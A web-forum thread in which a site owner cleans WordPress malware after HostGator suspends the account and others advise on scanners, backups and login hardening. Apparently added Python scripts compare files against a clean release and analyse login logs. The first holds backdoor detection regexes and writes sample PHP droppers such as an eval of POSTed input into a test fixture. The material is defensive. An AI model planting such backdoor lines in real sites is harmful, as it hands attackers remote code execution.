HostGator disabled my site for malware

by bsurb
40 replies
So apparently one of my sites contained malware in the content and HostGator says I'm responsible for removing it myself before they can enable my sites...

I notice they sent me an email with the malware and it's in public_html, wp-includes, and a theme that I don't use..

How do you go about removing the affected content so they can restore everything back?
#disabled #gator #host #malware #site
  • If a virus is only in files ... so the quickest solution is to make a copy of the database and then install Wordpress again.

    Best Regards,
    Arthur
  • csine
    You could also try installing a malware checking plugin like wordfence or succuri security, and run a scan.
    • professorrosado
      Quickly go to cPanel - files manager and find the theme folder and delete it.
      Send the notice to HG and request the site be brought back in order to continue to scan the site for other malware.
      Install Malware Scanner "GotMLS" - very good plugin with personal support from its developer.

      Activate it and go to the scanning page. Remove ALL the file extensions in the "Skip these file extensions" box and then run a full scan.

      This will tell you if you have any Malware left in your file side and will quarantine them - simply delete these files.

      Then run an update on your site - make sure all plugins are up to date, remove all unused themes, change your cPanel password (maybe do that first thing in fact).
      Change all FTP passwords (sometimes done with your cPanel password change - make sure), change ALL email passwords on your account.

      Now install Wordfence, check users for new registrations, check Wordfence for brute force attacks - keep monitoring.

      The moment a new malware is spotted on that site - scrap it - the database is infected and will certainly spread to any other sites that share your cPanel. Hope you have a distant but good back up.
  • bsurb
    Here is what HostGator emailed me:

    The theme it shows looks like the themes that come with the site anyways. So I don't even use those. I can just delete the folders with the exact locations in the picture?

    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    • professorrosado
      The first few are not theme files, they are WP includes files - if the other site is sharing your cPanel, either your cPanel password was compromised or your database was. By the looks of the files, I would assume at this point that your database is infected.

      Do you have good back ups (that means well before you got hacked)?

      Can you live with the back up as your new starting point? Prepare yourself for this best of two scenarios (the other being starting all over from scratch).

      I would do all the things I suggested above, but you will need to get a fresh copy of WP and download the files to your computer (then I would FTP into your account and find each file indicated by HG and overwrite with your fresh clean WP file).

      I would delete anything that is a plugin file period - you can always get a new plugin later.

      Explain in detail to HG how you resolved each instance of malware and that you want to get into the site in order to update all plugins and WP itself. Also, you will install new Malware scanning and Wordfence plugin and perform scans immediately.

      Have them monitor the site as well and if Malware pops up again - your database is compromised. Burn and rebuild.
  • bsurb
    Or I can at least save the articles into Notepad and then restart; that way I can get the articles back in.

    So if I make a backup of the database and I make a backup of the zip file of my Wordpress files through file manager, when I re install Wordpress and upload the zip file of Wordpress and import the database, the same corrupted files shown in the pic are going to be there though??

    How do I get those out that are in the pic.

    Deleting the current theme wouldn't do any good as the malware doesn't appear to be in it.. HostGator won't bring it back up unless I fix it, they said.
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    • professorrosado
      There is a plugin or Wp has a built in export feature that allows you to export the articles into an xml file which you can then import into your new blog.

      EDITED: Yes, it's built into Wordpress - look for the export feature in Admin Dashboard navigation under > Tools
    • professorrosado
      Originally Posted by bsurb

      ....So if I make a backup of the database and I make a backup of the zip file of my Wordpress files through file manager, when I re install Wordpress and upload the zip file of Wordpress and import the database, the same corrupted files shown in the pic are going to be there though??

      How do I get those out that are in the pic.

      Deleting the current theme wouldn't do any good as the malware doesn't appear to be in it.. HostGator won't bring it back up unless I fix it, they said.
      I explained in my first post that you need to download a NEW WP file directory. You have to download WP from the repository - a direct download to your computer. Extract the files and now you have all the WP files on your computer (place in an easy to remember folder).

      Then go to your cPanel through FTP client like filezilla and select each indicated file (infected) and navigate through filezilla to your WP folder on your computer and replace the infected files by uploading (overwriting) the new version over the old infected one.

      Backing up now isn't a good idea - you're only backing up an infected site and database.

      You should have had a few backups since you began your site until now. If you can export your articles, then don't worry about old backups as you do not know when you were infected.

      https://wordpress.org/download/
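The recovery steps in professorrosado's posts above (delete the unused bundled theme, overwrite each file HostGator listed with the same file from a fresh https://wordpress.org/download/ archive, then scan for anything left) come down to one comparison: the live tree against a pristine copy of the same WordPress release. The script below is an added example, not code from the thread or from any plugin named in it. It does that comparison and then greps every PHP file in the live tree for the backdoor idioms mass WordPress infections usually leave behind (eval of a base64/gzip-decoded blob, eval or a shell call on raw request input, preg_replace with the /e modifier). The rule names, the fixture paths (a Twenty Fifteen theme directory, a dropped wp-cache.php) and the injected snippets are constructed for the demo. On a real account, point clean at the extracted release and live at an FTP download of public_html; if you have shell access, WP-CLI's `wp core verify-checksums` does the core-file half of this against wordpress.org's published checksums.

```python
"""Integrity diff of a live WordPress tree against a pristine release, plus a
content scan for common PHP backdoor idioms. Added example; the fixture
built by build_demo() is constructed, not taken from the thread."""
import hashlib
import re
import tempfile
from pathlib import Path

# Heuristic rules for the injection idioms most mass WP infections use.
# Rule names are made up for this demo; extend the table for your site.
SUSPICIOUS = {
    "eval-of-decoded-payload": re.compile(
        rb"@?eval\s*\(\s*@?\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "eval-of-request-input": re.compile(
        rb"@?(?:eval|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "shell-of-request-input": re.compile(
        rb"(?:system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    "preg_replace-e-modifier": re.compile(
        rb"preg_replace\s*\(\s*['\"].*?[/#~|][a-zA-Z]*e[a-zA-Z]*['\"]\s*,"),
}


def hash_tree(root: Path) -> dict:
    """Map each file under root (path relative to root, POSIX form) to its SHA-256."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_trees(clean: Path, live: Path) -> dict:
    """Compare the live install with a pristine extract of the same release.
    'modified' are shipped files whose bytes changed; 'added' are files the
    release does not ship (your plugins and uploads, or an attacker's)."""
    ref, cur = hash_tree(clean), hash_tree(live)
    return {
        "modified": sorted(p for p in ref if p in cur and cur[p] != ref[p]),
        "added": sorted(p for p in cur if p not in ref),
        "missing": sorted(p for p in ref if p not in cur),
    }


def scan_file(path: Path) -> list:
    """Names of every SUSPICIOUS rule that fires on the file's raw bytes."""
    data = path.read_bytes()
    return [name for name, rx in SUSPICIOUS.items() if rx.search(data)]


def triage(clean: Path, live: Path) -> dict:
    """Integrity diff plus a content scan of every .php file in the live tree,
    grouped by the action the thread recommends for each group."""
    delta = diff_trees(clean, live)
    hits = {}
    for path in sorted(live.rglob("*.php")):
        rules = scan_file(path)
        if rules:
            hits[path.relative_to(live).as_posix()] = rules
    return {
        "overwrite_from_clean_copy": delta["modified"],
        "review_or_delete": delta["added"],
        "restore_from_clean_copy": delta["missing"],
        "pattern_hits": hits,
    }


def build_demo() -> dict:
    """Constructed fixture mirroring the thread: a core include tampered with
    and a dropper planted in an unused bundled theme. Returns triage() of it."""
    work = Path(tempfile.mkdtemp())
    clean, live = work / "clean", work / "live"
    for root in (clean, live):
        (root / "wp-includes").mkdir(parents=True)
        (root / "wp-content" / "themes" / "twentyfifteen").mkdir(parents=True)
        (root / "index.php").write_text("<?php require __DIR__ . '/wp-blog-header.php';\n")
        (root / "wp-content" / "themes" / "twentyfifteen" / "style.css").write_text(
            "/* Theme Name: Twenty Fifteen */\n")
    pristine = "<?php function wp_is_clean() { return true; }\n"
    (clean / "wp-includes" / "functions.php").write_text(pristine)
    # Injected line appended to a shipped core file (base64 of "echo 'hi';").
    (live / "wp-includes" / "functions.php").write_text(
        pristine + "@eval(base64_decode('ZWNobyAnaGknOw=='));\n")
    # Dropper that executes whatever is POSTed to it, hidden in a theme dir.
    (live / "wp-content" / "themes" / "twentyfifteen" / "wp-cache.php").write_text(
        "<?php if (isset($_POST['p'])) { @eval($_POST['p']); }\n")
    return triage(clean, live)


if __name__ == "__main__":
    for group, items in build_demo().items():
        print(group, items)
```

Anything under overwrite_from_clean_copy is a shipped file to replace byte-for-byte from the archive; anything under review_or_delete is not part of the release, so it is either something you installed or something the attacker dropped, and pattern_hits tells you which of those to open first. Two caveats: the diff covers core only, so plugins and themes need their own reference copies (or deletion and reinstall, as the thread advises), and the regexes are heuristics that heavily obfuscated droppers evade, which is why the rest of the advice above still applies: rotate cPanel, FTP, database and WordPress passwords before the site goes back up, and treat a reinfection after a clean restore as a sign that credentials or the database are still compromised.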
  • littleseizure
    I've been on more hosting companies than I can reliably count. Recently I registered a domain - one domain - with HG, and they've been such a pain that I'm considering rescinding the purchase and going with one of the other companies I've been using forever. Just sayin'...
    Signature
    Mongol General: Wrong! Conan! What is best in life?
    Conan: Crush your enemies, see them driven before you, and hear the lamentation of their women....
  • csine
    With so many files infected in the base folder, your cPanel password is definitely compromised.
  • jackiedesign
    Contact HostGator support and let them know the truth. Hopefully they will help you get it back. I think it will be best to contact them; they can unban it.
  • tuhinindia1971
    It is better to knock on HostGator's door. We all know HostGator is one of the leading service providers in this sector. So I am sure the helpdesk will support you fully. Thanks a lot.
  • bsurb
    I just got the malware removed off a blog of mine, I cleaned up my cPanel with old site files I no longer use.

    From experience or knowledge, does anybody know the best plugins to use for security? I don't mind spending a few bucks on a premium plugin on ThemeForest if it helps..

    Changing cPanel and WordPress password to something hard. Keeping plugins and theme up to date. What else should you be monitoring daily?

    What kind of hosting would you recommend if you own several sites? Right now I'm on HostGator's shared.
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
    • professorrosado
      Originally Posted by bsurb

      I just got the malware removed off a blog of mine, I cleaned up my cPanel with old site files I no longer use.

      From experience or knowledge, does anybody know the best plugins to use for security? I don't mind spending a few bucks on a premium plugin on ThemeForest if it helps..

      Changing cPanel and WordPress password to something hard. Keeping plugins and theme up to date. What else should you be monitoring daily?

      What kind of hosting would you recommend if you own several sites? Right now I'm on HostGator's shared.
      Wordfence
      WP Security

      Bullet Proof Security is very strong, however, I've found it troublesome for some types of sites / themes.

      Monitor live traffic, note repeated IPs and countries trying to access login.php - if you can, lock your login page and rename it.
      Also whitelist your own IP for WP access (back end).
      Ask your host to restrict access to cPanel only to your IP. If they say they can't, move to another host.

      The main focus for you is to restrict access, block registrations, block countries with heavy hacker activity - Russia and China right off the bat. Use the IQ Block Country plugin for this.

      Daily monitor live traffic on each site, immediately delete registrations that have weird emails and are from China or Russia, etc.

      Change cPanel and ALL passwords and WP passwords on a regular periodic basis.

      Make regular backups after malware scans and develop a backup storage plan so that you know that the you always have a clean and viable backup to fall back on.

      Hackers use software to attack your sites so you need diligent and relentless monitoring of your websites and cPanel while making sure you can destroy your database and site at anytime and be back up and running within minutes. This is the minimum state you need to maintain if you wish to avoid hacker induced business interruption or at least keep it manageable and limited.
      • bsurb
        How about Sucuri Security? I have that plugin installed now right after I had the malware removed.
        Signature
        Vinyl Signs & Web Design in Ocala, FL.
        • professorrosado
          I find that I can do most of what Sucuri does (premium) myself.

          I usually do not find a need to pay for most of the services I need. I do a little research and learn how to do things myself.

          One example is Wordfence has a country blocker but they want you to go premium to get it. I just look for another plugin that does the country blocking for free.

          If a free functionality is available then I say go free.

          There is also a cPanel database changes / malware scanner too. The developer (only one) wants their fee for that too! But with the scanner type plugins cited and others available that monitor file changes, it is more than you should expect really. But none of these can prevent your site or database from getting hacked - so why spend the hundreds?

          Your best protection is a great back up strategy.
          • bsurb
            Thanks for the help. I have Sucuri installed and I haven't paid anything. Every time somebody makes an attempt to log into my blog or does log in, it sends me an email.

            Just last night I woke up and got an email that someone had two failed login attempts on my site. It also tells me what username they tried using.

            To scan for malware do you recommend WP security?

            How about a plugin for your daily backups? I found a plugin called BlogVault. It keeps daily backups of your blog including your database but that is like $9 per month with a week free trial.

            But basically you run a malware scan with a plugin, if it detects no malware, proceed with a backup so you have a clean copy. How often do you backup?
            Signature
            Vinyl Signs & Web Design in Ocala, FL.
            • professorrosado
              Originally Posted by bsurb

              Thanks for the help. I have Sucuri installed and I haven't paid anything. Every time somebody makes an attempt to log into my blog or does log in, it sends me an email.

              Just last night I woke up and got an email that someone had two failed login attempts on my site. It also tells me what username they tried using.

              To scan for malware do you recommend WP security?

              How about a plugin for your daily backups? I found a plugin called BlogVault. It keeps daily backups of your blog including your database but that is like $9 per month with a week free trial.

              But basically you run a malware scan with a plugin, if it detects no malware, proceed with a backup so you have a clean copy. How often do you backup?
              Use both Wordfence & GOTMLS.

              cPanel should have a backup scheduler. Did you install the site using Softaculous or other installer? They usually have a backup utility.

              The number of backups and frequency depend on your type of site. If it is just an information blog, then schedule backups according to your sense of comfort and the level of hacker (login attempts) occurring on your site. If your site is an active member site, with many logins and user interactions / contributions everyday from members and new registrations, etc., you'll need a daily backup to ensure you can recover with minimal loss of member activity as possible.

              You'll need to have a system for rotating off your host periodic good backups for your offline storage - for example, just before the schedule trashes the oldest backup to make room for a new backup, remove the old one by downloading it to your own storage hard drive. Develop your own method of keeping viable backups at your location so you can free up your acct. space.

              Can't speak for Sucuri, although many testify to its power, I tried it and it did not impress me (without my money). I do a lot more with multiple free plugins.

              I am not against people earning a living from their work, but it gets ridiculous to have to pay here and there and everywhere for every little bell and whistle. I wouldn't pay for any functionality that I can find elsewhere for free and plugin developers should not charge for functionality available for free either - put on your thinking caps and free up the free. Buyer beware!

              Also, never panic and remember the export function of WP before you kill an infected install.
  • seobro
    That is why I personally dislike using WordPress. Hackers are drawn to it like flies to horse manure. HTML is much more secure. Please learn your lesson as I did years ago. Also, if you ever do get some traffic, it will eat up a lot of resources. HG will ban you for sure. Remember that MySQL databases are a resource pig. That is why WordPress web sites load like watching grass grow.
    • bsurb
      I've had 4 attempted failed logins today.

      Does Joomla have any more benefits security-wise rather than WP??

      Wordpress seems so very easy to get into.
      Signature
      Vinyl Signs & Web Design in Ocala, FL.
  • sweetcrabhoney18
    Same thing happened to me two weeks ago with Site5. The company was such a jerk about it I just closed the account, moved my sites to Liquid Web because they fixed the issue for me and had my site up in only a few hours. Compared to Site5 having my site down for 4 days.

    It takes time to edit the files ... ask if they have a service to help you with it. And focus on only one domain at a time if the account has more than one on it.
    Signature

    keep moving forward

  • 0xFF
    If a web hosting company asked me such a thing with this tone, I'd go to a competitor without delay. It's their job to clean up your space or, at least, to help you do it (e.g. telling you what to enable/install and run through your cPanel).
  • bsurb
    So what do you suggest? Keep my eyes out daily and keep making backups? It just seems like way too much work to handle one site?...
    Signature
    Vinyl Signs & Web Design in Ocala, FL.
  • onegoodman
    What I hate about HostGator: they take you down first, then they talk to you. They have a golden rule: customer comes last.
    • professorrosado
      Originally Posted by onegoodman

      What I hate about HostGator: they take you down first, then they talk to you. They have a golden rule: customer comes last.
      They are not the only ones - it is common procedure. Obviously, it takes a while for your site to become so compromised. Why keep it up any longer - you obviously are not monitoring the site? It gets your attention though, doesn't it?
      • onegoodman
        Originally Posted by professorrosado

        They are not the only ones - it is common procedure. Obviously, it takes a while for your site to become so compromised. Why keep it up any longer - you obviously are not monitoring the site? It gets your attention though, doesn't it?
        The first step should be to try helping me as a customer to stay in business: an alert, a notification, or even a call if this is actually urgent, not an email telling me that they screwed my business by suspending my account. What do I tell my customer for my website being offline 3 days after I solve the problem in less than an hour (even malware is easy to fix, but how long would it take HostGator support to reinstate that account)? Sure, there are many crappy companies like HostGator that do the same (probably owned by the same parent company as HostGator), but there are also companies that would be respectful enough to notify me in advance.
        • bsurb
          I got two more failed login attempts this morning. They are all the same IP. Do I talk to HostGator about blocking an IP address or can I do that on my end?
          Signature
          Vinyl Signs & Web Design in Ocala, FL.
          • professorrosado
            Originally Posted by bsurb

            I got two more failed login attempts this morning. They are all the same IP. Do I talk to HostGator about blocking an IP address or can I do that on my end?
            Why aren't you using Wordfence?
            Why haven't you installed All in One WP Security plugin?
            BulletProof Security Plugin?

            All of these free plugins would block this automatically with tweaking as I have suggested.

            One IP is good news! I had to deal with hundreds at a time!

            Also, did you install GOTMLS? Remember to remove all the extensions in the skip files section so that it can scan everything in your domain! This plugin is the absolute best malware detector out there - I've tried everything and this plugin and developer is spot on the best!
            • bsurb
              Originally Posted by professorrosado

              Why aren't you using Wordfence?
              Why haven't you installed All in One WP Security plugin?
              BulletProof Security Plugin?

              All of these free plugins would block this automatically with tweaking as I have suggested.

              One IP is good news! I had to deal with hundreds at a time!

              Also, did you install GOTMLS? Remember to remove all the extensions in the skip files section so that it can scan everything in your domain! This plugin is the absolute best malware detector out there - I've tried everything and this plugin and developer is spot on the best!
              I just installed the All In One WP Security and Firewall plugin and the Wordfence plugin...

              Since I have those installed, should I delete the Sucuri plugin? Or can I have all of these installed at the same time?

              Sucuri sends me emails every time I log in or someone is trying to log into my admin area.

              The bullet proof plugin can I have that installed as well? Seems like a lot of different plugins... Is that safe?

              I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

              What should I stick to?
              Signature
              Vinyl Signs & Web Design in Ocala, FL.
              • professorrosado
                Seems like a lot of different plugins... Is that safe?

                I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

                What should I stick to?
                They each do similar and dissimilar functions. GOTMLS is a malware scanner and the others don't do what this can well. Wordfence scans files but nothing like GOTMLS.

                Yes, unless you see problems on your site, you can have all of them running. The issue is which ones do what and do you really need two that do the exact same things.

                Your question shouldn't be should I have one or the other; rather, you should add as many protective functions on your site as possible.

                Just an hour ago I added yet another plugin because it specifically mentioned blocking xmlrpc exploit hacking and I was noticing traffic calling on that file in particular.

                Hackers are non stop relentless exploiters and you need to be just as much a relentless defender!
              • zotohost
                Just a small recommendation. If you have an issue with WordPress and you're not sure how to fix it / secure it then it's better for you to go for managed WordPress hosting. Sure you have to pay a bit more but you can leave all the worries about WordPress to them and focus on your core activity.

                Please don't use multiple plugins for security. This will further complicate the issue. Use only one plugin.

                Originally Posted by bsurb

                I just installed the All In One WP Security and Firewall plugin and the Wordfence plugin...

                Since I have those installed, should I delete the Sucuri plugin? Or can I have all of these installed at the same time?

                Sucuri sends me emails every time I log in or someone is trying to log into my admin area.

                The bullet proof plugin can I have that installed as well? Seems like a lot of different plugins... Is that safe?

                I also have this installed currently. It seems like a pretty decent one.. https://wordpress.org/plugins/gotmls/

                What should I stick to?
        • professorrosado
          Originally Posted by onegoodman

          The first step should be to try helping me as a customer to stay in business: an alert, a notification, or even a call if this is actually urgent, not an email telling me that they screwed my business by suspending my account. What do I tell my customer for my website being offline 3 days after I solve the problem in less than an hour (even malware is easy to fix, but how long would it take HostGator support to reinstate that account)? Sure, there are many crappy companies like HostGator that do the same (probably owned by the same parent company as HostGator), but there are also companies that would be respectful enough to notify me in advance.
          Well, you see onegoodman, this company did look out for "your" business as it shut down an infested neighbor of yours who would have caused your business to get hacked, or your shared server from being bombarded and who knows what else, if they didn't shut him down immediately!

          So I'm glad you can appreciate that professional and responsible action.
          • professorrosado
            FYI Post:

            HOST:
            What I have had hosts do for me in the past is the following:
            I provide them with a list of IPs to Blacklist from my entire account.
            I have also Whitelisted my own IP for my entire account - especially cPanel access.

            You need to have static IP for this.

            WP Plugins:
            Wordfence live traffic monitor - non-existent page tab lists anybody trying to access plugins and back end directly and allows you to block their IP. Do this survey every day at least once a day depending on traffic volume and you should be good - if you're getting attacked, then you'll need to be more aggressive too!

            Bullet Proof Security is very powerful but it is a little bit harder to use effectively on your site and in some cases (themes/plugins) causes an issue with your site - but it is definitely well worth your time in trying and tweaking for your site.

            All In One WP Security - Lots of neat features that are usually premium in other plugins.

            IQ Country Block: Sorry Russia and China! Done! This plugin also can restrict dashboard access to your static IP (whitelists it) and you can limit access to your own country to further reduce access.

            So you see with this last plugin in place, the other plugins and their IP blocking functions, and your Hosting company's IP Blocking (they can also do the country blocks for you too) you'll have three levels of IP blocking and restricted access barriers which should keep off most of the "amateurs" and hacking students out there which cause most of the problems for WP users.

            Also share information about hacking attempts, IP addresses and registrant emails used by them to gain access to your sites so that others can quickly put up defenses for their sites.

            This is why I took the time to post here in this thread so that others can build up more defenses for their sites as a service to the WP community and fellow Warriors. I am sure we all will appreciate any contributions that any of you may add to our Wordpress defense skillset as a way to fight back!
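The three layers in the FYI post above (a host-side blacklist, the plugins' own IP blocking, and whitelisting your static IP for the back end) can all be driven from the raw access log, which cPanel exposes on shared hosting even when no plugin is installed. The script below is an added example, not code from the thread or from Wordfence, and runs offline on constructed log lines (RFC 5737 documentation addresses): it counts POSTs per source IP to wp-login.php and xmlrpc.php, the two endpoints credential-stuffing tools hit, treats anything at or above a threshold that is outside your own network as an offender, and emits the Apache 2.4 .htaccess rules that deny those addresses site-wide and restrict the two endpoints to your own network. The threshold of 3 and the 192.0.2.0/24 admin network are assumptions; substitute your own.

```python
"""Brute-force login detection from an Apache access log, with .htaccess output.
Added example; SAMPLE_LOG is constructed, not taken from the thread."""
import re
from collections import Counter
from ipaddress import ip_address, ip_network

# Apache "combined" format; only the fields used below are captured.
LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# The two endpoints WordPress credential-stuffing tools hammer.
LOGIN_ENDPOINTS = ("/wp-login.php", "/xmlrpc.php")

# Constructed sample: one bot on wp-login.php, one on xmlrpc.php, and one
# real admin login from the owner's network (RFC 5737 addresses throughout).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2015:03:12:01 -0500] "POST /wp-login.php HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:03:12:02 -0500] "POST /wp-login.php HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:03:12:03 -0500] "POST /wp-login.php HTTP/1.1" 200 3562 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2015:03:12:04 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Oct/2015:03:15:09 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "-"
198.51.100.22 - - [10/Oct/2015:03:15:09 -0500] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "-"
198.51.100.22 - - [10/Oct/2015:03:15:10 -0500] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 2000 "-" "-"
192.0.2.50 - - [10/Oct/2015:08:00:00 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.50 - - [10/Oct/2015:08:00:05 -0500] "GET /wp-admin/ HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""


def count_login_posts(lines) -> Counter:
    """POSTs to the login endpoints per source IP. A browser login is one or
    two POSTs; a tool is dozens. Query strings are ignored when matching."""
    counts = Counter()
    for line in lines:
        m = LOG_RX.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0] in LOGIN_ENDPOINTS:
            counts[m["ip"]] += 1
    return counts


def offenders(counts, threshold, allow_nets) -> list:
    """IPs at or above threshold that are not inside an allow-listed network.
    A source field that is not an address (a hostname, if HostnameLookups is
    on) cannot be allow-listed and is kept."""
    nets = [ip_network(n) for n in allow_nets]
    result = []
    for ip, n in counts.items():
        if n < threshold:
            continue
        try:
            if any(ip_address(ip) in net for net in nets):
                continue
        except ValueError:
            pass
        result.append(ip)
    return sorted(result)


def htaccess_rules(blocked, admin_nets) -> str:
    """Apache 2.4 snippet: deny the offenders site-wide, then allow the login
    and XML-RPC endpoints only from the admin's networks. With no admin
    network given, the endpoints are left as they are."""
    lines = ["# Generated: offenders seen brute-forcing wp-login.php / xmlrpc.php",
             "<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {ip}" for ip in blocked]
    lines.append("</RequireAll>")
    if admin_nets:
        lines.append('<FilesMatch "^(wp-login|xmlrpc)\\.php$">')
        lines += [f"    Require ip {net}" for net in admin_nets]
        lines.append("</FilesMatch>")
    return "\n".join(lines) + "\n"


def analyze(log_text: str, threshold: int, admin_nets) -> dict:
    """Run the pipeline on raw log text and return everything worth checking."""
    counts = count_login_posts(log_text.splitlines())
    blocked = offenders(counts, threshold, admin_nets)
    return {"counts": dict(counts), "blocked": blocked,
            "htaccess": htaccess_rules(blocked, admin_nets)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG, threshold=3, admin_nets=["192.0.2.0/24"])["htaccess"])
```

Three caveats. The Require syntax is Apache 2.4; a host still on 2.2 needs Order/Deny directives instead, and on any host a typo in .htaccess takes the whole site down with a 500, so try the generated file on a staging copy first. If the site sits behind a CDN or reverse proxy, the first field of the log is the proxy's address, not the attacker's, and blocking it blocks everyone. And locking xmlrpc.php to your own network also locks out Jetpack and the WordPress mobile apps, which is what you want only if you do not use them.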
  • maxsi
    Talk to HostGator and explain the problem, they must believe in their customers. Explaining your case is the best way to resolve the problem.

    Otherwise you can change your hosting.
  • Kingfish85
    Originally Posted by 0xFF

    If a web hosting company asked me such a thing with this tone, I'd go to a competitor without delay. It's their job to clean up your space or, at least, to help you do it (e.g. telling you what to enable/install and run through your cPanel).
    This is absolutely incorrect, with ANY hosting provider. As the website owner, it's your responsibility to maintain the website, not the host's. If the host ended up making sure sites were updated and not using junk, exploited themes/plugins, half of the sites would be broken.

    These are typical WordPress exploits. The best thing you can do is remove everything and start with fresh copies of everything on the account. This is one of the drawbacks of using "addon domains": once a site gets compromised, everything on the hosting account does.

    Unfortunately, while HostGator doesn't have the best reputation anymore, there's nothing wrong with what they did. It's not their responsibility to make sure the websites are properly secured.
  • Rich Struck
    This is why WordPress is so awesome.
  • Sagar Mehta
    I've had this issue on my WP sites too, all hosted on Hostgator.

    One thing I've noticed is that the affected sites were all installed using Softaculous - any sites I installed manually don't have any of that malware.

    It ultimately ended up with Firefox and Chrome refusing to open any of my sites without that red warning.

    You may need someone who knows their way around this stuff to help you out and fix stuff. I found switching my account to new hosting and exporting only the blogs I needed much easier. I had to organize my server anyway, and wanted to move away anyway.
    Signature
    Need AWESOME Customer Support For Your Product / Service / Upcoming Launches? > Click Here <
  • Khovai
    Lol, please do not delete your entire theme folder or re-install WordPress as some people are suggesting. Look for a plugin called ELI Anti-Malware.

    That plugin alone will scan your entire website and will notify you in most cases of any malware or backdoors on your server.

    Also, change your password before logging in again. Most of the hacks I dealt with were just people who spammed pharma links or hid pharma links via styling in people's pages.

    Change your password to something secure: I use Strong Random Password Generator
    Then run GOTMLS which you've already been recommended and fix the red-hot issues that it recommends.

    This is why I also tell people not to buy those crappy ThemeForest themes because they come loaded with plugins that authors abandon or fail to update. Also, remember to keep ALL of your plugins up to date at all times. It's so easy to target a website via outdated plugins and gain access to it without even getting a password.

    I stress this all the time yet clients never do it.
    Signature
    Offering Writing/Content Services (And Not For Cheap)
    Just 1 quality article is far better than 20 cheap $5 articles